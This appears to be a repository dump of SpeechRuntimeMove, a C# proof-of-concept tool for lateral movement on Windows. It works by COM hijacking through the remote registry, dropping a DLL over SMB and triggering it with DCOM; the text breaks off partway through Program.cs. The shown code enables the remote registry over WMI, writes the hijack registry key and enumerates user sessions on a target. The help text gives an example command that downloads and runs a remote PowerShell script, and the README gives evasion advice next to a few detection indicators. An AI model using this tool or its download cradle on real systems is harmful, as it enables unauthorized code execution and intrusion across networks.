├── images
    └── COMHijack.png
├── SpeechRuntimeMove
    ├── app.config
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── SpeechRuntimeMove.csproj
    ├── SessionEnum.cs
    ├── RemoteRegistry.cs
    ├── Program.cs
    ├── ComUtilities.cs
    ├── Definitions.cs
    └── FileDrop.cs
├── LICENSE
├── SpeechRuntimeMove.sln
└── README.md


/images/COMHijack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rtecCyberSec/SpeechRuntimeMove/HEAD/images/COMHijack.png


--------------------------------------------------------------------------------
/SpeechRuntimeMove/app.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <configuration>
3 | <startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6"/></startup></configuration>
4 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2025 r-tec Cyber Security
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/SpeechRuntimeMove.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.4.33205.214
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SpeechRuntimeMove", "SpeechRuntimeMove\SpeechRuntimeMove.csproj", "{3D7F522D-23F3-4849-9DEA-11613184B913}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{3D7F522D-23F3-4849-9DEA-11613184B913}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{3D7F522D-23F3-4849-9DEA-11613184B913}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{3D7F522D-23F3-4849-9DEA-11613184B913}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{3D7F522D-23F3-4849-9DEA-11613184B913}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {7297D190-0E73-42C2-A2A0-D2E6515A17C8}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/SpeechRuntimeMove/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("SpeechRuntimeMove")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SpeechRuntimeMove")]
13 | [assembly: AssemblyCopyright("Copyright ©  2025")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("3d7f511d-23f3-2848-9dea-22613184b913")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SpeechRuntimeMove
 2 | Lateral Movement via SpeechRuntime DCOM trigger & COM Hijacking.
 3 | 
 4 | This Proof of Concept (PoC) for Lateral Movement abuses the fact, that some COM Classes configured as `INTERACTIVE USER` will spawn a process in the context of the currently logged on users session.
 5 | 
 6 | If those processes are also vulnerable to COM Hijacking, we can configure a COM Hijack via the remote registry, drop a malicious DLL via SMB and trigger loading/execution of this DLL via DCOM.
 7 | 
 8 | This technique removes the need to takeover the system plus afterward:
 9 | 1) Impersonate the target user
10 | 2) Steal the target users credentials from LSASS or somewhere else
11 | 3) or use alternative techniques to take over the account
12 | 
13 | Because our code is already getting executed in the context of the logged in user, we can do whatever we want in that context and create less IoCs for alternative techniques.
14 | 
15 | In this PoC, the CLSID `38FE8DFE-B129-452B-A215-119382B89E3D` - Speech Named Pipe COM is used with the IID `ISpeechNamedPipe`. `SpeechRuntime.exe` will be spawned whenever an instance of the Speech Named Pipe COM Class is created, which is vulnerable to COM Hijacking:
16 | 
17 | <br>
18 | <div align="center">
19 |     <img src="https://github.com/rtecCyberSec/SpeechRuntimeMove/blob/main/images/COMHijack.png?raw=true" width="500">
20 | </div>
21 | <br>
22 | 
23 | 
24 | The CLSID `655D9BF9-3876-43D0-B6E8-C83C1224154C` (and many more) are looked for under `HKCU`, which we can hijack from remote.
25 | 
26 | # Enum Mode
27 | 
28 | To find out, which users are active on a remote client you can use the enum mode like this:
29 | 
30 | ```bash
31 | SpeechRuntimeMove.exe mode=enum target=<targetHost>
32 | ```
33 | 
34 | # Attack mode
35 | 
36 | To actually execute code on the remote system, you need to specify the target username, the Session number, the DLL drop path as well as the command to execute:
37 | 
38 | ```bash
39 | SpeechRuntimeMove.exe mode=attack target=<targetHost> dllpath=C:\windows\temp\pwned.dll session=2 targetuser=local\domadm command="cmd.exe /C calc.exe"
40 | ```
41 | 
42 | # OpSec considerations / Detection
43 | 
44 | The PoC uses a hardcoded DLL, which will always look the same and which will get dropped on the target. It's super easy to build detections on this DLL, so using a self written DLL will less likely get you detected.
45 | With a custom DLL you will also live in a trusted signed process instead of spawning a new one, that's usually what attackers prefer.
46 | 
47 | Behavior based detection of this technique can be done by checking for
48 | 1) Remote COM Hijack of the mentioned CLSID followed by
49 | 2) `SpeechRuntime.exe` loading a newly dropped DLL from the hijack location
50 | 3) `SpeechRuntime.exe` spawning suspicious sub-processes
51 | 
52 | 


--------------------------------------------------------------------------------
/SpeechRuntimeMove/SpeechRuntimeMove.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{3D7F522D-23F3-4849-9DEA-11613184B913}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <RootNamespace>SpeechRuntimeMove</RootNamespace>
10 |     <AssemblyName>SpeechRuntimeMove</AssemblyName>
11 |     <TargetFrameworkVersion>v4.6</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <Deterministic>true</Deterministic>
14 |     <TargetFrameworkProfile />
15 |   </PropertyGroup>
16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 |     <PlatformTarget>AnyCPU</PlatformTarget>
18 |     <DebugSymbols>true</DebugSymbols>
19 |     <DebugType>full</DebugType>
20 |     <Optimize>false</Optimize>
21 |     <OutputPath>bin\Debug\</OutputPath>
22 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
23 |     <ErrorReport>prompt</ErrorReport>
24 |     <WarningLevel>4</WarningLevel>
25 |     <Prefer32Bit>false</Prefer32Bit>
26 |   </PropertyGroup>
27 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
28 |     <PlatformTarget>AnyCPU</PlatformTarget>
29 |     <DebugType>pdbonly</DebugType>
30 |     <Optimize>true</Optimize>
31 |     <OutputPath>bin\Release\</OutputPath>
32 |     <DefineConstants>TRACE</DefineConstants>
33 |     <ErrorReport>prompt</ErrorReport>
34 |     <WarningLevel>4</WarningLevel>
35 |     <Prefer32Bit>false</Prefer32Bit>
36 |   </PropertyGroup>
37 |   <ItemGroup>
38 |     <Reference Include="System" />
39 |     <Reference Include="System.Core" />
40 |     <Reference Include="System.Management" />
41 |     <Reference Include="System.Xml.Linq" />
42 |     <Reference Include="System.Data.DataSetExtensions" />
43 |     <Reference Include="Microsoft.CSharp" />
44 |     <Reference Include="System.Data" />
45 |     <Reference Include="System.Xml" />
46 |   </ItemGroup>
47 |   <ItemGroup>
48 |     <Compile Include="ComUtilities.cs" />
49 |     <Compile Include="Definitions.cs" />
50 |     <Compile Include="FileDrop.cs" />
51 |     <Compile Include="Program.cs" />
52 |     <Compile Include="Properties\AssemblyInfo.cs" />
53 |     <Compile Include="RemoteRegistry.cs" />
54 |     <Compile Include="SessionEnum.cs" />
55 |   </ItemGroup>
56 |   <ItemGroup>
57 |     <None Include="app.config" />
58 |   </ItemGroup>
59 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
60 | </Project>


--------------------------------------------------------------------------------
/SpeechRuntimeMove/SessionEnum.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Data;
  3 | using System.Runtime.InteropServices;
  4 | 
  5 | namespace SpeechRuntimeMove
  6 | {
  7 |     static class SessionEnum
  8 |     {
  9 |         [DllImport("winsta.dll", SetLastError = true, CharSet = CharSet.Unicode)]
 10 |         public static extern IntPtr WinStationOpenServerW(string serverName);
 11 | 
 12 |         [DllImport("winsta.dll", SetLastError = true)]
 13 |         public static extern bool WinStationCloseServer(IntPtr hServer);
 14 | 
 15 |         [DllImport("winsta.dll", SetLastError = true)]
 16 |         public static extern bool WinStationEnumerateW(IntPtr hServer, out IntPtr ppSessionIds, out uint count);
 17 | 
 18 |         [DllImport("winsta.dll", SetLastError = true)]
 19 |         public static extern bool WinStationQueryInformationW(IntPtr hServer, uint sessionId, int infoClass, IntPtr pInfo, uint infoSize, out uint returnLength);
 20 | 
 21 |         [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
 22 |         public struct SessionIdW
 23 |         {
 24 |             public uint SessionId;
 25 |             [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 33)]
 26 |             public string WinStationName;
 27 |             public int State;
 28 |         }
 29 | 
 30 |         [StructLayout(LayoutKind.Sequential)]
 31 |         public struct PROTOCOLCOUNTERS
 32 |         {
 33 |             public int WdBytes;
 34 |             public int WdFrames;
 35 |             public int WaitForOutBuf;
 36 |             public int Frames;
 37 |             public int Bytes;
 38 |             public int CompressedBytes;
 39 |             public int CompressFlushes;
 40 |             public int Errors;
 41 |             public int Timeouts;
 42 |             public int AsyncFramingError;
 43 |             public int AsyncOverrunError;
 44 |             public int AsyncOverflowError;
 45 |             public int AsyncParityError;
 46 |             public int TdErrors;
 47 |             public short ProtocolType;
 48 |             public short Length;
 49 | 
 50 |             [MarshalAs(UnmanagedType.ByValArray, SizeConst = 100)]
 51 |             public int[] Reserved;
 52 |         }
 53 | 
 54 |         [StructLayout(LayoutKind.Sequential)]
 55 |         public struct CACHE_STATISTICS
 56 |         {
 57 |             private readonly short ProtocolType;
 58 |             private readonly short Length;
 59 | 
 60 |             [MarshalAs(UnmanagedType.ByValArray, SizeConst = 20)]
 61 |             private readonly int[] Reserved;
 62 |         }
 63 | 
 64 |         [StructLayout(LayoutKind.Sequential)]
 65 |         public struct PROTOCOLSTATUS
 66 |         {
 67 |             public PROTOCOLCOUNTERS Output;
 68 |             public PROTOCOLCOUNTERS Input;
 69 |             public CACHE_STATISTICS Statistics;
 70 |             public int AsyncSignal;
 71 |             public int AsyncSignalMask;
 72 |         }
 73 | 
 74 |         [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
 75 |         public struct WINSTATIONINFORMATIONW
 76 |         {
 77 |             public ConnectionState State;
 78 | 
 79 |             [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 33)]
 80 |             public string WinStationName;
 81 | 
 82 |             public int SessionId;
 83 |             public int Unknown;
 84 |             public FILETIME ConnectTime;
 85 |             public FILETIME DisconnectTime;
 86 |             public FILETIME LastInputTime;
 87 |             public FILETIME LoginTime;
 88 |             public PROTOCOLSTATUS ProtocolStatus;
 89 | 
 90 |             [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 18)]
 91 |             public string Domain;
 92 | 
 93 |             [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 24)]
 94 |             public string UserName;
 95 | 
 96 |             public FILETIME CurrentTime;
 97 |         }
 98 | 
 99 |         public static void enumerate(string serverName)
100 |         {
101 | 
102 |             IntPtr hServer = WinStationOpenServerW(serverName);
103 |             if (hServer == IntPtr.Zero)
104 |             {
105 |                 Console.WriteLine("[-] Failed to open server.");
106 |                 return;
107 |             }
108 |             //Console.WriteLine($"Server Handle: 0x{hServer.ToInt64():X}");
109 | 
110 |             IntPtr pSessionIds;
111 |             uint count;
112 |             if (WinStationEnumerateW(hServer, out pSessionIds, out count))
113 |             {
114 |                 Console.WriteLine($"[*] Number of sessions: {count}");
115 |                 int structSize = Marshal.SizeOf(typeof(SessionIdW));
116 |                 for (uint i = 0; i < count; i++)
117 |                 {
118 |                     IntPtr currentPtr = new IntPtr(pSessionIds.ToInt64() + (i * structSize));
119 |                     SessionIdW session = Marshal.PtrToStructure<SessionIdW>(currentPtr);
120 |                     Console.WriteLine("\r\n");
121 |                     Console.WriteLine($"SessionID: {session.SessionId}");
122 |                     Console.WriteLine($"State: {session.State}");
123 |                     Console.WriteLine($"SessionName: {session.WinStationName}");
124 | 
125 |                     WINSTATIONINFORMATIONW wsInfo = new WINSTATIONINFORMATIONW();
126 |                     IntPtr pInfo = Marshal.AllocHGlobal(Marshal.SizeOf(wsInfo));
127 |                     uint returnLength;
128 |                     if (WinStationQueryInformationW(hServer, session.SessionId, 8, pInfo, (uint)Marshal.SizeOf(wsInfo), out returnLength))
129 |                     {
130 |                         wsInfo = Marshal.PtrToStructure<WINSTATIONINFORMATIONW>(pInfo);
131 |                         string userName = wsInfo.Domain + "\\" + wsInfo.UserName;
132 |                         Console.WriteLine($"UserName: {userName}");
133 |                     }
134 |                     else
135 |                     {
136 |                         Console.WriteLine($"[-] Failed to query session info for SessionName: {session.WinStationName}");
137 |                     }
138 |                     Marshal.FreeHGlobal(pInfo);
139 |                 }
140 |                 Marshal.FreeHGlobal(pSessionIds);
141 |             }
142 |             else
143 |             {
144 |                 Console.WriteLine("[-] Failed to enumerate sessions.");
145 |             }
146 | 
147 |             if (!WinStationCloseServer(hServer))
148 |             {
149 |                 Console.WriteLine("[-] Failed to close server handle.");
150 |             }
151 |         }
152 |     }
153 | }
154 | 


--------------------------------------------------------------------------------
/SpeechRuntimeMove/RemoteRegistry.cs:
--------------------------------------------------------------------------------
  1 | using Microsoft.Win32;
  2 | using System;
  3 | using System.Collections.Generic;
  4 | using System.Linq;
  5 | using System.Management;
  6 | using System.Security.Principal;
  7 | 
  8 | 
  9 | namespace SpeechRuntimeMove
 10 | {
 11 |   
 12 |     static class RemoteRegistry
 13 |     {
 14 |         static void EnableRemoteRegistryViaWMI(string computerName, string username = null, string password = null)
 15 |         {
 16 |             try
 17 |             {
 18 |                 ConnectionOptions options = new ConnectionOptions();
 19 |                 if (!string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
 20 |                 {
 21 |                     options.Username = username;
 22 |                     options.Password = password;
 23 |                 }
 24 | 
 25 |                 ManagementScope scope = new ManagementScope(
 26 |                     $"\\\\{computerName}\\root\\cimv2", options);
 27 |                 scope.Connect();
 28 | 
 29 |                 // Get the RemoteRegistry service
 30 |                 ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_Service WHERE Name='RemoteRegistry'");
 31 |                 ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query);
 32 | 
 33 |                 foreach (ManagementObject service in searcher.Get())
 34 |                 {
 35 |                     // Change startup type to Automatic
 36 |                     ManagementBaseObject inParams = service.GetMethodParameters("ChangeStartMode");
 37 |                     inParams["StartMode"] = "Automatic";
 38 |                     service.InvokeMethod("ChangeStartMode", inParams, null);
 39 | 
 40 |                     // Start the service
 41 |                     service.InvokeMethod("StartService", null);
 42 | 
 43 |                     Console.WriteLine("[+] Remote Registry service enabled and started successfully!");
 44 |                 }
 45 |             }
 46 |             catch (Exception ex)
 47 |             {
 48 |                 Console.WriteLine($"Error: {ex.Message}");
 49 |             }
 50 |         }
 51 | 
 52 |         public static void DisableRemoteRegistryViaWMI(string computerName, string username = null, string password = null)
 53 |         {
 54 |             try
 55 |             {
 56 |                 ConnectionOptions options = new ConnectionOptions();
 57 |                 if (!string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
 58 |                 {
 59 |                     options.Username = username;
 60 |                     options.Password = password;
 61 |                 }
 62 | 
 63 |                 ManagementScope scope = new ManagementScope(
 64 |                     $"\\\\{computerName}\\root\\cimv2", options);
 65 |                 scope.Connect();
 66 | 
 67 |                 // Get the RemoteRegistry service
 68 |                 ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_Service WHERE Name='RemoteRegistry'");
 69 |                 ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query);
 70 | 
 71 |                 foreach (ManagementObject service in searcher.Get())
 72 |                 {
 73 |                     // Stop the service
 74 |                     service.InvokeMethod("StopService", null);
 75 |                     Console.WriteLine("[+] Remote Registry service stopped successfully!");
 76 | 
 77 |                     // Change the startup type to Disabled
 78 |                     ManagementBaseObject inParams = service.GetMethodParameters("ChangeStartMode");
 79 |                     inParams["StartMode"] = "Disabled";
 80 |                     service.InvokeMethod("ChangeStartMode", inParams, null);
 81 | 
 82 |                     Console.WriteLine("[+] Remote Registry service disabled successfully!");
 83 |                 }
 84 |             }
 85 |             catch (Exception ex)
 86 |             {
 87 |                 Console.WriteLine($"[-] Error: {ex.Message}");
 88 |             }
 89 |         }
 90 | 
 91 |         public static bool VerifyRegistryEntry(string computerName, string username, string expectedDllPath)
 92 |         {
 93 |             try
 94 |             {
 95 |                 // Resolve username to SID
 96 |                 NTAccount userAccount = new NTAccount(username);
 97 |                 SecurityIdentifier userSid = (SecurityIdentifier)userAccount.Translate(typeof(SecurityIdentifier));
 98 |                 string sidString = userSid.ToString();
 99 | 
100 |                 // Construct the registry path
101 |                 string registryPath = $@"{sidString}\SOFTWARE\Classes\CLSID\{{655D9BF9-3876-43D0-B6E8-C83C1224154C}}\InProcServer32";
102 | 
103 |                 // Open the remote registry key
104 |                 using (RegistryKey remoteBaseKey = RegistryKey.OpenRemoteBaseKey(RegistryHive.Users, computerName))
105 |                 {
106 |                     // Try to open the specific registry key
107 |                     using (RegistryKey inProcKey = remoteBaseKey.OpenSubKey(registryPath))
108 |                     {
109 |                         if (inProcKey == null)
110 |                         {
111 |                             return false; // Key doesn't exist
112 |                         }
113 | 
114 |                         // Get the default value and compare
115 |                         string currentDllPath = inProcKey.GetValue("")?.ToString();
116 |                         return !string.IsNullOrEmpty(currentDllPath) &&
117 |                                 currentDllPath.Equals(expectedDllPath, StringComparison.OrdinalIgnoreCase);
118 |                     }
119 |                 }
120 |             }
121 |             catch (Exception ex)
122 |             {
123 |                 Console.WriteLine($"[-] Error verifying registry entry: {ex.Message}");
124 |                 return false;
125 |             }
126 |         }
127 |         public static bool WriteRegistryEntryForUser(string computerName, string username, string dllPath)
128 |         {
129 |             try
130 |             {
131 |                 EnableRemoteRegistryViaWMI(computerName);
132 |             }
133 |             catch
134 |             {
135 |                 Console.WriteLine("[-] Enabling remote registry failed.");
136 |             }
137 |             try
138 |             {
139 |                 // Attempt to resolve the username to a SID
140 |                 NTAccount userAccount = new NTAccount(username);
141 |                 SecurityIdentifier userSid = (SecurityIdentifier)userAccount.Translate(typeof(SecurityIdentifier));
142 |                 string sidString = userSid.ToString();
143 | 
144 |                 string registryPath = $@"{sidString}\SOFTWARE\Classes\CLSID\{{655D9BF9-3876-43D0-B6E8-C83C1224154C}}";
145 | 
146 |                 // Open the remote registry key
147 |                 using (RegistryKey remoteBaseKey = RegistryKey.OpenRemoteBaseKey(RegistryHive.Users, computerName))
148 |                 {
149 |                     // Ensure the CLSID key exists
150 |                     using (RegistryKey clsidKey = remoteBaseKey.CreateSubKey(registryPath))
151 |                     {
152 |                         // Create or open the InProcServer32 subkey
153 |                         using (RegistryKey inProcKey = clsidKey.CreateSubKey("InProcServer32"))
154 |                         {
155 |                             // Set the default value to the provided DLL path
156 |                             inProcKey.SetValue("", dllPath);
157 |                         }
158 |                     }
159 |                 }
160 | 
161 |                 return true;
162 |             }
163 |             catch (Exception ex)
164 |             {
165 |                 Console.WriteLine($"[-] Error writing registry entry: {ex.Message}");
166 |                 return false;
167 |             }
168 |         }
169 | 
170 |         public static bool DeleteRegistryEntry(string computerName, string username)
171 |         {
172 |             try
173 |             {
174 |                 // Resolve username to SID
175 |                 NTAccount userAccount = new NTAccount(username);
176 |                 SecurityIdentifier userSid = (SecurityIdentifier)userAccount.Translate(typeof(SecurityIdentifier));
177 |                 string sidString = userSid.ToString();
178 | 
179 |                 // Construct the base registry path
180 |                 string baseRegistryPath = $@"{sidString}\SOFTWARE\Classes\CLSID\{{655D9BF9-3876-43D0-B6E8-C83C1224154C}}";
181 | 
182 |                 // Open the remote registry key
183 |                 using (RegistryKey remoteBaseKey = RegistryKey.OpenRemoteBaseKey(RegistryHive.Users, computerName))
184 |                 {
185 |                     // First, try to delete the InProcServer32 subkey
186 |                     try
187 |                     {
188 |                         remoteBaseKey.OpenSubKey(baseRegistryPath, true)?.DeleteSubKey("InProcServer32", false);
189 |                     }
190 |                     catch (Exception ex)
191 |                     {
192 |                         Console.WriteLine($"[-] Error deleting InProcServer32 subkey: {ex.Message}");
193 |                     }
194 | 
195 |                     // Then attempt to delete the entire CLSID entry
196 |                     try
197 |                     {
198 |                         remoteBaseKey.OpenSubKey($@"{sidString}\SOFTWARE\Classes\CLSID", true)
199 |                             ?.DeleteSubKey("{{655D9BF9-3876-43D0-B6E8-C83C1224154C}}", false);
200 |                     }
201 |                     catch (Exception ex)
202 |                     {
203 |                         Console.WriteLine($"[-] Error deleting CLSID entry: {ex.Message}");
204 |                         return false;
205 |                     }
206 |                 }
207 | 
208 |                 return true;
209 |             }
210 |             catch (Exception ex)
211 |             {
212 |                 Console.WriteLine($"[-] Error deleting registry entry: {ex.Message}");
213 |                 return false;
214 |             }
215 |         }
216 |         
217 |         static List<string> getUsers(string computerName)
218 |         {
219 |             int timeout = 5000; // Timeout in milliseconds
220 |             List<string> results = new List<string>();
221 |             RegistryKey remoteRegistry = null;
222 |             string[] subKeyNames = new string[0];
223 |             try
224 |             {
225 |                 remoteRegistry = RegistryKey.OpenRemoteBaseKey(RegistryHive.Users, computerName);
226 |             }
227 |             catch
228 |             {
229 |                 Console.WriteLine("[-] Failed to query HKEY_USERS");
230 |             }
231 |             try
232 |             {
233 |                 subKeyNames = remoteRegistry.GetSubKeyNames(); // Get all the subkey names (user SIDs)
234 |             }
235 |             catch
236 |             {
237 |                 Console.WriteLine("[-] Failed to query user subkeys");
238 |             }
239 |             try
240 |             {
241 |                 // Open remote base key in HKEY_USERS for the remote computer
242 | 
243 |                 List<string> userSIDs = new List<string>();
244 | 
245 |                 // Loop through all the keys and filter for valid SIDs
246 |                 foreach (var key in subKeyNames)
247 |                 {
248 |                     if (IsValidSid(key))
249 |                     {
250 |                         userSIDs.Add(key);
251 |                         results.Add(key);
252 |                     }
253 |                 }
254 | 
255 |                 // Resolve SIDs to user accounts
256 |                 foreach (var sid in userSIDs)
257 |                 {
258 |                     try
259 |                     {
260 |                         SecurityIdentifier userSid = new SecurityIdentifier(sid);
261 |                         NTAccount userAccount = (NTAccount)userSid.Translate(typeof(NTAccount));
262 |                         string[] splitEntry = userAccount.Value.Split('\\');
263 | 
264 |                         // Apply custom filters (skip entries as per your conditions)
265 |                         if (splitEntry.Length == 2)
266 |                         {
267 |                             string domain = splitEntry[0];
268 |                             string username = splitEntry[1];
269 | 
270 |                             // Customize this condition to meet your filtering needs
271 |                             if (!domain.Contains(" ") && !username.Contains(computerName))
272 |                             {
273 |                                 results.Add($"Domain: {domain}, User: {username}");
274 |                             }
275 |                         }
276 |                     }
277 |                     catch
278 |                     {
279 |                         // Handle cases where SID translation fails
280 |                         Console.WriteLine($"Failed to translate SID: {sid}");
281 |                     }
282 |                 }
283 | 
284 |                 remoteRegistry.Close();
285 |             }
286 |             catch (Exception ex)
287 |             {
288 |                 Console.WriteLine($"Error: {ex.Message}");
289 |             }
290 | 
291 |             // Sort and print the results
292 |             var sortedResults = results.Distinct().OrderBy(r => r).ToList();
293 |             /*
294 |             foreach (var result in sortedResults)
295 |             {
296 |                 Console.WriteLine(result);
297 |             }*/
298 | 
299 |             return results;
300 |         }
301 | 
302 |         // Helper function to validate if a string is a valid SID
303 |         static bool IsValidSid(string key)
304 |         {
305 |             return System.Text.RegularExpressions.Regex.IsMatch(key, @"^S-\d-\d+-(\d+-){1,14}\d+$");
306 |         }
307 | 
308 |     }
309 | }
310 | 


--------------------------------------------------------------------------------
/SpeechRuntimeMove/Program.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Diagnostics;
  3 | using System.Runtime.InteropServices;
  4 | using System.Threading;
  5 | using static SpeechRuntimeMove.Definitions;
  6 | 
  7 | 
  8 | 
  9 | namespace SpeechRuntimeMove
 10 | {
 11 |     static class Program
 12 |     {
 13 | 
 14 |         static void DisplayHelp()
 15 |         {
 16 |             Console.WriteLine("\nUsage:");
 17 |             Console.WriteLine("  Enumeration:  <Program> mode=enum target=<ip>");
 18 |             Console.WriteLine("  Attack:       <Program> mode=attack target=<ip> dllpath=<dllpath> targetuser=<targetuser> command=<command>");
 19 |             Console.WriteLine("\nExample:");
 20 |             Console.WriteLine("  <Program> mode=enum target=192.168.1.100");
 21 |             Console.WriteLine(@"  <Program> mode=attack target=192.168.1.100 dllpath=C:\windows\temp\evil.dll targetuser=domadm session=2 command=powershell.exe iex(new-object net.webclient).downloadstring('https://url.com/script.ps1')");
 22 |         }
 23 |         static void Main(string[] args)
 24 |         {
 25 |             Console.WriteLine(@"
 26 | 
 27 |    _____                      __    ____              __  _                __  ___              
 28 |   / ___/____  ___  ___  _____/ /_  / __ \__  ______  / /_(_)___ ___  ___  /  |/  /___ _   _____ 
 29 |   \__ \/ __ \/ _ \/ _ \/ ___/ __ \/ /_/ / / / / __ \/ __/ / __ `__ \/ _ \/ /|_/ / __ \ | / / _ \
 30 |  ___/ / /_/ /  __/  __/ /__/ / / / _, _/ /_/ / / / / /_/ / / / / / /  __/ /  / / /_/ / |/ /  __/
 31 | /____/ .___/\___/\___/\___/_/ /_/_/ |_|\__,_/_/ /_/\__/_/_/ /_/ /_/\___/_/  /_/\____/|___/\___/ 
 32 |     /_/                                                                                         
 33 |          Lateral Movement via custom DCOM trigger
 34 |                           by @ShitSecure
 35 |     ");
 36 |             
 37 |             string targetIP = null;
 38 |             /*string username = null; custom user for execution removed for reasons
 39 |             string password = null;
 40 |             string domain = null;*/
 41 |             string dllPath = null;
 42 |             string targetUser = null;
 43 |             string command = null;
 44 |             string sessionstr = "1";
 45 |             string mode = "attack"; // Default mode
 46 | 
 47 |             // Parse named arguments
 48 |             foreach (string arg in args)
 49 |             {
 50 |                 if (arg.StartsWith("mode=", StringComparison.OrdinalIgnoreCase))
 51 |                 {
 52 |                     mode = arg.Substring(5).ToLower();
 53 |                 }
 54 |                 else if (arg.StartsWith("target=", StringComparison.OrdinalIgnoreCase))
 55 |                 {
 56 |                     targetIP = arg.Substring(7);
 57 |                 }
 58 |                 else if (arg.StartsWith("dllpath=", StringComparison.OrdinalIgnoreCase))
 59 |                 {
 60 |                     dllPath = arg.Substring(8);
 61 |                 }
 62 |                 else if (arg.StartsWith("targetuser=", StringComparison.OrdinalIgnoreCase))
 63 |                 {
 64 |                     targetUser = arg.Substring(11);
 65 |                 }
 66 |                 else if (arg.StartsWith("command=", StringComparison.OrdinalIgnoreCase))
 67 |                 {
